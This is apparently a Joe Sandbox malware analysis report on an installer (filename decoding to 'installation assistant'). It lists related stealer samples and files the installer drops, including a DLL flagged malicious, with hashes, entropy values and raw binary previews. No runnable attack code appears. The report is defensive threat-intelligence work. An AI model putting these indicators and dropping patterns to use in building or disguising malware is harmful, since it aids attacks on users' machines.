          • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comAxoPac.exeGet hashmaliciousLummaCBrowse
          • 217.20.58.100
          [External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.emlGet hashmaliciousUnknownBrowse
          • 217.20.58.99
          PLEASE SIGN THIS DOCUMENT - Reference number(s) 0598190575 DPR.msgGet hashmaliciousUnknownBrowse
          • 217.20.58.101
          lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
          • 217.20.58.99
          fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
          • 217.20.58.100
          uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
          • 217.20.58.99
          data.exeGet hashmaliciousUnknownBrowse
          • 217.20.58.99
          4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
          • 217.20.58.100
          YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
          • 217.20.58.99
          gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
          • 217.20.58.99

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b1.0.3.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse

                            Created / dropped Files

                            C:\Program Files (x86)\Windows NT\7zr.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):831200
                            Entropy (8bit):6.671005303304742
                            Encrypted:false
                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Joe Sandbox View:
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\file.bin (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1298992
                            Entropy (8bit):7.999859712098508
                            Encrypted:true
                            SSDEEP:24576:Jm7V4SAXqwNu//CopofXJGkYYguHpFGnJ3jm7biUd163/etGJir:CFAXY3CwofZYAnGnJfW163/eP
                            MD5:6FFA62F827FB9CCD24B82A7B93CD0B92
                            SHA1:26BD8C8B9703ED628D5BFFC7F4F05C0434DDD192
                            SHA-256:3CF4EA11F2EE6642695B5D7F5373ECCFB381A4FE7DC79F796342BF214BBB7FE7
                            SHA-512:C32F17A21A0AFB4ABA501C3D0DAC3DD31610195C4B0CE96B16B0EE579EB9A1768BCE8B6D725AC06A0CBE21A1C4DA22D0FC37AEEE094CAAFF857D0A77C3C578E8
                            Malicious:false
                            Preview:.@S....Xt. ,-.................T.Y....Z#...R....h.x..ch...2..z#..f.......j..].<2Y...[G.. .........|Wo...h8V.N..0=`....K.hRw_..3....}"%.f.....%......w5..LxVd...i...6.D.8.p.{..M.|.:Z'j.1.T.;.:!.3.(".qJ.......vm.8.<....G.O.p,,.lE.w...0D.......\..T..6...M?k.."..}....).4..#....hMT.F..&...)h.y.......*.X0..f%......)..z.j..jO\..4...~.C../......"h...q......E!.........B..I)..c..............Nu....4J.....).f...x.VYL ...%.......?sznR.5..eiM.N<".L...#Wi..Qs...V/.p.v...g.....:..,.mZ....xL:.I5eHV-.N....).R~...\c....{..#k.n~Y.................#{............;.I....i.p...a..\n..z=....J.?...".%...F.;.o.2.Z./.Xn..9.......9......r......`q.f.....vt.*....2....cP{..^...Wr.].8.Y..b..iui.=w.;iC.b.~./Ad3lD....R.[Y...o.M......>X.....I....2,.1...tVhB......H#ek.R.._-|...}.~.`(..#5.....=.QS...:..m.hk,W.M.!..p.t....B..`7..<}..;.4.g.A.r...:.F..&.!..LN...oyn~..0.,.o0......x.'..^}.~:X.+.G.;.L.....<.........8.\.(...../.Su.....L(..3\&.:.....po6P5.w.9..5.=....T..ck.wU.e.d..

                            C:\Program Files (x86)\Windows NT\hrsw.vbc

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Virustotal, Detection: 15%, Browse
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\is-5HBF3.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1298992
                            Entropy (8bit):7.999859712098508
                            Encrypted:true
                            SSDEEP:24576:Jm7V4SAXqwNu//CopofXJGkYYguHpFGnJ3jm7biUd163/etGJir:CFAXY3CwofZYAnGnJfW163/eP
                            MD5:6FFA62F827FB9CCD24B82A7B93CD0B92
                            SHA1:26BD8C8B9703ED628D5BFFC7F4F05C0434DDD192
                            SHA-256:3CF4EA11F2EE6642695B5D7F5373ECCFB381A4FE7DC79F796342BF214BBB7FE7
                            SHA-512:C32F17A21A0AFB4ABA501C3D0DAC3DD31610195C4B0CE96B16B0EE579EB9A1768BCE8B6D725AC06A0CBE21A1C4DA22D0FC37AEEE094CAAFF857D0A77C3C578E8
                            Malicious:false
                            Preview:.@S....Xt. ,-.................T.Y....Z#...R....h.x..ch...2..z#..f.......j..].<2Y...[G.. .........|Wo...h8V.N..0=`....K.hRw_..3....}"%.f.....%......w5..LxVd...i...6.D.8.p.{..M.|.:Z'j.1.T.;.:!.3.(".qJ.......vm.8.<....G.O.p,,.lE.w...0D.......\..T..6...M?k.."..}....).4..#....hMT.F..&...)h.y.......*.X0..f%......)..z.j..jO\..4...~.C../......"h...q......E!.........B..I)..c..............Nu....4J.....).f...x.VYL ...%.......?sznR.5..eiM.N<".L...#Wi..Qs...V/.p.v...g.....:..,.mZ....xL:.I5eHV-.N....).R~...\c....{..#k.n~Y.................#{............;.I....i.p...a..\n..z=....J.?...".%...F.;.o.2.Z./.Xn..9.......9......r......`q.f.....vt.*....2....cP{..^...Wr.].8.Y..b..iui.=w.;iC.b.~./Ad3lD....R.[Y...o.M......>X.....I....2,.1...tVhB......H#ek.R.._-|...}.~.`(..#5.....=.QS...:..m.hk,W.M.!..p.t....B..`7..<}..;.4.g.A.r...:.F..&.!..LN...oyn~..0.,.o0......x.'..^}.~:X.+.G.;.L.....<.........8.\.(...../.Su.....L(..3\&.:.....po6P5.w.9..5.=....T..ck.wU.e.d..

                            C:\Program Files (x86)\Windows NT\is-VJI1E.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1048934
                            Entropy (8bit):7.999810584659191
                            Encrypted:true
                            SSDEEP:24576:zzo7JKPe56MvMbFP0ERf6gc0mgl2Cz8fyDPPK+tNTbotfxeeW:zzo1KPepUP/f6Z0NlZsyjy+tZb4AeW
                            MD5:D6E21035CF34180A78FD0609ACFA9285
                            SHA1:721C65391A0C2E18987202864D1CB08F9545AA3D
                            SHA-256:D1B45E42ABAEB7560E8E186277974790F97E141CAFCC3FF920460E542F9CD1AF
                            SHA-512:566E9571B984CDBF2BC9E51101894BB0BF61E857C03D90888AB9EAF93B3BDB7368F274D21893281A4603FE6390CA66EE201E022D25DADBA804D3523DFDE69D6C
                            Malicious:false
                            Preview:.hi..2...%....H.k...J.o,ET$+V..<..p.O.c._...R.?R.zmf."<...U....Fh....g......,....4-....*-.........qC...r..%..4...{...h..gm\"..er.T....H.l{=.<l...}...e....u.wT..bf....$...Z......j#..?...7..k..m#..3..A*.....<9T.n...I...YY..2l..)O..r.+.f.G...y......"K..c.7ug..].........d&.$.....u.............V..c.J>U.@..>2....5i...f.RcVP.:..........~.......q)t....P.V.l.h2.E..;.qE3p.6.....dn..4...o.q...........p....&.H.. .Z~..K......T.|.c*Q.5.tfStC........~..AX.J,.....i.T)lY..S.z..sL._........].......evYr...M.[v..6+.r.. H.m.k4...x*w..X....Q.n~.......+y../z5..'.._$.{<&.dZu.z?SHeIn~V..m.....4.v.,Z.5.}..^.D/h..6.R.-8.q.O.d...a....h..B......(..Dm`*.).xCW.".......V.D.db......Y.7..r..6.*.0;$....4......[.`..8.b.....wb.H1...S....c...f/......j..NX..h1.....R.O.dm.P..g..)..KT.....x.y...H.|...1..k%...v.S...u,.6.bn~...^.....AS[..u...q.Q.G4x.KB..q....&.$...o.H.i.MoX.w.*..*..........K....@..SF.*[...u..H...{?.Z.x>.u.......&3.?......s...Px9.._;..-U....4.F...d*.%T..e..

                            C:\Program Files (x86)\Windows NT\locale.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56530
                            Entropy (8bit):7.996546775800433
                            Encrypted:true
                            SSDEEP:1536:7DuRHPS0dk/fZO6X5QmoeCyxK0cpwjK5AOWB7xQFFiZNrkM:Uq7fHac0TpwXOQRB
                            MD5:21BFB225D2E39810D9EE735B3060E744
                            SHA1:7D199DF76261C313FDF7AC01337E6A1408AA8512
                            SHA-256:501CD7704495EA6DE9D1954D57B3AE8A64113D74DB6987989846B932EBA7777A
                            SHA-512:CEFCF390A30478EB458B40D3452B1C7113CD2639F25BC2DC5810213AE9A40EAA7476AEA59A929FFF76CF413EC9D6E74B061F8D25182EAE50BBD098AE81C29EAE
                            Malicious:false
                            Preview:.@S.......t| ..............[i.0..W...l.w...BCD.....k...%......F-.f.D.2VW..f..a$..E.B..Q.WD'..S..m.oX.`y-(/.=..f.>.W..}. .Oeb...9.S.,J...r...0.<=..b..e....H...|zT5qns....S..O.'B..w.'.>D-..q.VM .X..^.....m....Husi...f.{B..2..B..^...z..Y.1.R.s.....{...+.i..TdC...r.h.._`...KqE..E....}....Fn.+...~..ct.m..u.........aF.L...Q..]@}....<x..X...W.p.....Q{3...^..cU;...#.Zm,..Z.N]9#V....G..).>...4....q..UFI.A...../k.Bc.{..:B#..Rk.D,.:.W.h...VV6.>....w...?..,...4d....m6\.:l.....9.....}..*....F.c..L...]....zz?......N..*.4..A)t..Q.......1...8.s`!2;.'..,M...o.......W...:..v+7...D.Z..J..g?J.,,...G1.6<....>_.......}h%.h}......mw.L.NS.GsE..:.S..[*....*z.W.y..3U..g....b=,...iYx.y.U................mtag..6+.....l.. ... ......D.Y.4-..g...:..\9...K...%w.{...1.4..m..4F.}y..%b.......4MoN...%0r.S12.W.Q-.Z.kC/..i...%.zw...p...8;...}.#.z..M...K5.M....>7...=...z...o....7...v&...+.A..{.B...N........;.@........R....X....1....XW....j. R.....\.1..z..<X.d..*l.w+.3|..=.. ..b;-.s

                            C:\Program Files (x86)\Windows NT\locale.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56530
                            Entropy (8bit):7.996546775800435
                            Encrypted:true
                            SSDEEP:768:OM8fzupqIW2Fco+I2nUZp3apRhoFQevWPlE8O89ZtYTL/FPk06HoP+Y6FY1ykws7:qaIb2FcoRGUZplFGwgEqHo2dkRvospf9
                            MD5:65C9E51864D8DD52F2E31A2DE279E0E3
                            SHA1:85C553B3704B09DEFB2C64C0112FD9097A48C9E8
                            SHA-256:568D2F12C6BB93BE575029FC3995FD3BC6C23A109EAE1808CCB1ED8FF4EE45DF
                            SHA-512:CC6B145E56F10DC8B5E61E5742AABD9902ACF21A3F241A3F6DFA490B4279C36C1ED04B6355A35CA3C22F95530CAF607C59A31513F65C56ADA9B9CF156B351B42
                            Malicious:false
                            Preview:7z..'...f(..........2.........6.~K..V...........#.*..0iIN._..r7.............b....|./.'*.}....5..l}G.W.........X@/...,.td...V...mT,.-.3.../.;mTH....8#i....v....A6<......-.h.X.}..k.)G.U..{'.w...q....U[%...ehB....JV4.C.........;.a..pF...}...?3.g..._:...{t..:...b.w.1.9...!...d..A.....'".u..|?..`...~...t|?.4........C..-.v.J..jK.Y;..u..U+`.a$....3H.....RA.v....k9.M....5e..;..R...]^4.<MP].|G...;.0..h..4....|J..7_...G..O...........{.[4.E..@.......#.s..1..f.yq&.z..Q.-&.B.....c.r.|..Yf[.^.4......_.o...).O..l...$..m].O[3.]}..$.....1.@...m;.R;c.=.ae.........t}.x.^.p.Eh.....:-SK.....?..?..:4..g..........%0..9..K...iy...D6..J.....F.33.<p.R`c....6.cSF.....n...z#Gkc.v'4..M.DG>>....L.....8.5.+..S.....'.l.2.....V)h.=e.P..]....[.-.`z8.g..2/...m..I..(..|..8..E<}....Y@p..>...|.e..&U.y...0x.I..C.6...Vry.dT...&+......J.`j,..........}s..;...>...BH. .P.0..nj'...+..G.06&.m.0#.zFw.4.OQ).Yd!..`...LN\z.n3..h..{.S9.S.|.uk.%9.%..Q.x...........^.i...d..Jt....

                            C:\Program Files (x86)\Windows NT\locale2.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255975
                            Encrypted:true
                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                            Malicious:false
                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                            C:\Program Files (x86)\Windows NT\locale2.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255979
                            Encrypted:true
                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                            MD5:4CB8B7E557C80FC7B014133AB834A042
                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                            Malicious:false
                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                            C:\Program Files (x86)\Windows NT\locale3.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                            C:\Program Files (x86)\Windows NT\locale3.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                            C:\Program Files (x86)\Windows NT\locale4.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                            C:\Program Files (x86)\Windows NT\locale4.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
